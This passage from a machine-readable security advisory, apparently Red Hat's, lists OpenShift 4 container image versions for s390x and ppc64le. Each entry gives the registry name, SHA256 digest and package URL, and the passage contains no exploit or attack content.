"purl": "pkg:oci/openshift/ose-baremetal-installer-rhel9@sha256%3Abb8837b1089c78b2e0be230a4cfeebebcc32389f29dd1fbe658eb4ed79dbe328?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773430219"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-baremetal-operator-rhel9@sha256%3A3ed369f130a563c4e8e17d7d1f85974228b83a04650443eb7139eff04f487a82?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252335"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x",
"product_id": "registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:c4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-kube-apiserver-rhel9-operator@sha256%3Ac4a4f87455a06632dfb8015913b859accde36aa9cc51ab6c9b28c71d209ecc1f?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772896477"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:a00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ibm-vpc-block-csi-driver-rhel9@sha256%3Aa00a2c837b45a833c9480610052c2758a89ca13bddea7205fa864cf669b9a537?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749195"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-rhel9@sha256%3Af8de6e3bc707d84b0e44610c14a2cf7811175f49616678f24930e80861eb747d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773429934"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x",
"product_id": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:d4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-installer-artifacts-rhel9@sha256%3Ad4a2a09d63248f7f338ebadbdb03b48299d3c9284cb71ba81c3a6dc58534703c?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773430140"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x",
"product": {
"name": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x",
"product_id": "registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:e162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/kubevirt-csi-driver-rhel9@sha256%3Ae162628148310e6bf86cdafe3d0d0ce36c7842a9a6567381b9d90acde4ae0544?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773412620"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-config-rhel9-operator@sha256%3A9038aed4ef231563705daaa5a16ff519038611c6a5e19b81ad5b400288dd5fb4?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773174302"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x",
"product_id": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:da70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-machine-os-images-rhel9@sha256%3Ada70d7892969c1a5664afff73ed9c1e633b7db1c2d10c0fe2019fcbbbfae6b14?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773699238"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x",
"product_id": "registry.redhat.io/openshift4/network-tools-rhel9@sha256:f39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/network-tools-rhel9@sha256%3Af39bd18cd41526b1a7c11316b587246675331c87aae0307e43b6eb87a6674bb2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773220410"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3A6876729ee9b06ce876c1a9b210d1ae1751bb965ddd69758f93de0a8e58043b98?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746885"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3Ae880c7fb37086ce67796656384dd6ec09dcbdd3e78cc379fb237931364702391?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313364"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3A79dda8b8e9ee2839a8d915103d762f75b8adcbddd0752c5feb576ce49ea7c012?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773173252"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3Aec9369d6e4b5975c13c03190733867e962149166d236c590637efaa9106d2c8b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773215336"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A20d3df0bfd6732f7839f5b16ea87c7ae5b8d038134917c7655d9dde4aa839fb2?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773183892"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-autoscaler-rhel9@sha256%3A697d6e677df07abbf0abbe196bb3658128893fc4a1a59e375ba3f204b2532591?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772768149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-baremetal-runtimecfg-rhel9@sha256%3A8b78938f11f25edec777f3f26c6aea87503df3bc0de9d55860d7b854a0b4be9e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773133505"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-etcd-rhel9-operator@sha256%3Af2aa35a07325a3bc77b1ef19a64142df335fec60495945bd414396afe08af723?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773320537"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:acdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-monitoring-rhel9-operator@sha256%3Aacdd8863b390027824810aa2d1267728539dc1f8f89f8c4922d0af9e54c4cf8e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252333"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:c9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-network-rhel9-operator@sha256%3Ac9950a5f092d1bf0f9bd281e2cd161b4c53a8b9a8335911df110012b9a19ac4c?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772732947"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:af3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-cluster-node-tuning-rhel9-operator@sha256%3Aaf3cd518399c69bb2dfeee63db16ece4221f86bb5fd4367e6fc4855e7c094e0e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773334557"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-csi-driver-nfs-rhel9@sha256%3A7e573786dc8a3102297cdeb8e8df2d3baf09f84e90d23d3df307d119b8c50f1a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772749305"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le",
"product_id": "registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/driver-toolkit-rhel9@sha256%3A18e39b1bb67719078fa3ec73db9bc28ebb70f675ecbda63a5b2beed58e833906?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773739265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:ce0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hypershift-rhel9@sha256%3Ace0cc9b08b407cc5c7e2fb4b8b8046aa8d6602ff4f0f1446705ba41ebc343113?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773412958"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-kube-proxy-rhel9@sha256%3A1ce64cfcf954f04197e06b6b02be1193898157c629cc3c28592c768c3729d0db?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350955"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-marketplace-rhel9@sha256%3A6cafee543c79ead47ce0f20f21a27e5cf086d83efe1729f749feab1c17a993c4?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773172418"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-monitoring-plugin-rhel9@sha256%3A5d5f2e96e9216c9858a00c3f5e6da0441b8431e1916cb2bf15f30106454283d0?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746857"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le",
"product_id": "registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/oc-mirror-plugin-rhel9@sha256%3A43bfff1dba401620d69e3e8c2ebbd661ccaef081b01a440d820027560d1ab148?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772896602"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-docker-builder-rhel9@sha256%3Af4c29b8743f133e7480aebbc25971f9357badd3befa9f9487503c39a4bf55f66?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1772733078"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9@sha256:6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9@sha256%3A6ec6749f659c131148713fa74ca30e17622814fab8f891a7cd823d65c6a9d93b?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773280408"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:b7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-console-rhel9-operator@sha256%3Ab7b0327a11ee514d86c11faba549e614b7bc32f4998365d3372b23fbdce92f45?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773252330"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-hyperkube-rhel9@sha256%3Ab51b955ab667088df969d867c5c78afa6c0e91799a77947c71f74fe5121e4b82?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350963"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-keepalived-ipfailover-rhel9@sha256%3A66bf4a0ba4cbc5c74d13c83255452e5738e34fa7ef1b5966706c5f41d58d161e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773746829"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-pod-rhel9@sha256%3A0c43c58afb2f86cd157abb2399616592e4f264352257bd8b8cec738b5f2a247a?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773350811"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-tests-rhel9@sha256:2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tests-rhel9@sha256%3A2765a1507713582a3ca790fccfaa5c23ee08dd42d53ba463d823b71d93a4833e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773413265"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le",
"product_id": "registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-lifecycle-manager-rhel9@sha256%3A60f6eb74dc8622db479b1939b65ea403464560fc4020a9b359164c3245b5e345?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1773313312"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:5a8eedf55bdce3483fbad37f69a026a3d18b8f34ce9bf7bf7075ae28a385244d_ppc64le",
"product": {
